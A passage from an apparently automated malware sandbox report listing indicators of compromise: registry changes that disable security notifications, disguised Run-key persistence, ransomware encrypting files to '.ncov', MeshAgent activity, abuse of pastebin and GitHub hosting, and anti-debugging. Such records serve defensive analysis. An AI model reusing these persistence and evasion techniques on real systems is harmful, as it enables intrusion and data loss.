Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysklnorbcv.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysmablsvr.exe
-
Adds Run key to start application 2 TTPs 10 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" | CoronaVirus.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bwapp = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\bwapp.exe" | bwapp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\ProgramData\\explorer.exe" | explorer.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" | tt.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | aspnet_regiis.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | 1713315379.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" | s.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" | tdrpload.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe" | o.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\first = "C:\\Users\\Admin\\AppData\\Roaming\\first.exe" | first.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 64 IoCs
description | ioc | Process
File opened for modification | C:\Users\Public\Pictures\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\Documents\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\Libraries\desktop.ini | CoronaVirus.exe
File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-87863914-780023816-688321450-1000\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Program Files\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Searches\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\Downloads\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\Videos\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Music\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\Desktop\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Contacts\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\Music\desktop.ini | CoronaVirus.exe
File opened for modification | C:\$Recycle.Bin\S-1-5-21-87863914-780023816-688321450-1000\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Pictures\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Favorites\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | CoronaVirus.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | CoronaVirus.exe
File opened for modification | C:\Program Files (x86)\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Videos\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Links\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\Documents\desktop.ini | CoronaVirus.exe
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | CoronaVirus.exe
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 135 pastebin.com 136 pastebin.com 123 raw.githubusercontent.com 124 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 130 ip-api.com 430 ip-api.com 1053 ip-api.com -
pid Process 10712 GameBarPresenceWriter.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification 
C:\Windows\SysWOW64\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\645A97B36E98BCD4272D29226E3007FBB538D950 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification 
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BD7B7842D638B7F1216CF9F7E5124E30D7308DCC MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B6ED760C7AC9682BD48CCDEB13A0D04341739964 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\B6ED760C7AC9682BD48CCDEB13A0D04341739964 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 9 IoCs
pid Process 1132 tasklist.exe 5952 tasklist.exe 5576 tasklist.exe 6860 tasklist.exe 760 tasklist.exe 6000 tasklist.exe 2600 tasklist.exe 5716 tasklist.exe 3028 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 3200 khtoawdltrha.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11044 def.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 7048 random.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe 11476 explorer.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5700 set thread context of 1736 5700 winupsecvmgr.exe 238 PID 5700 set thread context of 1984 5700 winupsecvmgr.exe 240 PID 1268 set thread context of 2816 1268 BaddStore.exe 291 PID 7068 set thread context of 2156 7068 pimer_bbbcontents7.exe 350 PID 11032 set thread context of 7508 11032 4434.exe 373 -
resource yara_rule behavioral1/files/0x002e0000000453cd-12959.dat upx behavioral1/memory/8548-12965-0x0000000000AB0000-0x0000000000D13000-memory.dmp upx behavioral1/memory/8548-13000-0x0000000000AB0000-0x0000000000D13000-memory.dmp upx behavioral1/memory/7144-13577-0x00007FF874D70000-0x00007FF875435000-memory.dmp upx behavioral1/memory/7144-13588-0x00007FF889B00000-0x00007FF889B0F000-memory.dmp upx behavioral1/memory/7144-13587-0x00007FF881170000-0x00007FF881195000-memory.dmp upx behavioral1/memory/7144-13601-0x00007FF876970000-0x00007FF876AEF000-memory.dmp upx behavioral1/memory/7144-13611-0x00007FF87EEE0000-0x00007FF87EFAD000-memory.dmp upx behavioral1/memory/7144-13610-0x00007FF875AE0000-0x00007FF876009000-memory.dmp upx behavioral1/memory/7144-13609-0x00007FF87F7E0000-0x00007FF87F813000-memory.dmp upx behavioral1/memory/7144-13608-0x00007FF887BA0000-0x00007FF887BAD000-memory.dmp upx behavioral1/memory/7144-13607-0x00007FF884F00000-0x00007FF884F19000-memory.dmp upx behavioral1/memory/7144-13600-0x00007FF87F820000-0x00007FF87F844000-memory.dmp upx behavioral1/memory/7144-13599-0x00007FF887880000-0x00007FF88789A000-memory.dmp upx behavioral1/memory/7144-13598-0x00007FF880360000-0x00007FF88038D000-memory.dmp upx behavioral1/memory/7144-13616-0x00007FF887920000-0x00007FF88792D000-memory.dmp upx behavioral1/memory/7144-13615-0x00007FF881150000-0x00007FF881164000-memory.dmp upx behavioral1/memory/7144-13618-0x00007FF874D70000-0x00007FF875435000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\PresentationFramework.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\System.Windows.Input.Manipulations.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_Subscription-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini CoronaVirus.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-conio-l1-1-0.dll CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xerces.md CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\PresentationUI.resources.dll CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019MSDNR_Retail-ul-oob.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program 
Files\Java\jdk-1.8\jre\legal\jdk\cldr.md.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.Cryptography.Csp.dll CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.IO.Packaging.dll CoronaVirus.exe File opened for modification C:\Program Files\MoveExport.emf.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome.exe.sig.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019DemoR_BypassTrial180-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Threading.Overlapped.dll CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.Cryptography.X509Certificates.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\local_policy.jar CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.WebSockets.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png CoronaVirus.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jaccess.jar.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-pl.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created 
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Collections.NonGeneric.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Globalization.Calendars.dll CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\UIAutomationTypes.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ul-oob.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\StopClear.dxf.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.WebSockets.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-100.png.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Configuration.ConfigurationManager.dll.id-F0D1BDE8.[[email protected]].ncov 
CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\lv.pak.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-sysinfo-l1-1-0.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfxswt.jar.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.IO.UnmanagedMemoryStream.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Security.Permissions.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\PREVIEW.GIF.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\THMBNAIL.PNG.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Resources.Writer.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ExcelTellMeOnnxModel.bin CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\System.Windows.Forms.Primitives.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files 
(x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features.txt CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Numerics.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ppd.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.boot.tree.dat CoronaVirus.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\SmallLogoDev.png CoronaVirus.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\System.Windows.Forms.Design.resources.dll CoronaVirus.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\System.Windows.Forms.Design.resources.dll.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ul-oob.xrm-ms CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.id-F0D1BDE8.[[email protected]].ncov CoronaVirus.exe -
Drops file in Windows directory 49 IoCs
description ioc Process File opened for modification C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\SingleOxford InfluencedNervous.exe File opened for modification C:\Windows\SponsorDpi InfluencedNervous.exe File opened for modification C:\Windows\BrickFin InfluencedNervous.exe File created C:\Windows\sysnldcvmr.exe 1713315379.exe File created C:\Windows\sysklnorbcv.exe o.exe File opened for modification C:\Windows\DemonstrationCult SingerJudy.exe File opened for modification C:\Windows\CrackBride SingerJudy.exe File opened for modification C:\Windows\HeatedTimothy InfluencedNervous.exe File opened for modification C:\Windows\ChuckVoltage InfluencedNervous.exe File opened for modification C:\Windows\NtOperations InfluencedNervous.exe File opened for modification C:\Windows\ParadeMorrison ldqj18tn.exe File created C:\Windows\sysppvrdnvs.exe tdrpload.exe File opened for modification C:\Windows\AirfareGambling InfluencedNervous.exe File opened for modification C:\Windows\SeattleNuke InfluencedNervous.exe File opened for modification C:\Windows\WindowsAlberta InfluencedNervous.exe File opened for modification C:\Windows\sysnldcvmr.exe 1713315379.exe File opened for modification C:\Windows\SixCream splwow64.exe File opened for modification C:\Windows\AtlasAdvantages InfluencedNervous.exe File opened for modification C:\Windows\PlayersSite InfluencedNervous.exe File opened for modification C:\Windows\sysvplervcs.exe s.exe File opened for modification C:\Windows\BlondKatrina InfluencedNervous.exe File opened for modification C:\Windows\LuggageRepresentations splwow64.exe File opened for modification C:\Windows\HomelessLaser splwow64.exe File opened for modification C:\Windows\MatchedThem SingerJudy.exe File opened for modification C:\Windows\AdsAsp InfluencedNervous.exe File opened for modification C:\Windows\NhlPhrases InfluencedNervous.exe File opened for modification C:\Windows\DefinedDrill InfluencedNervous.exe File opened for modification 
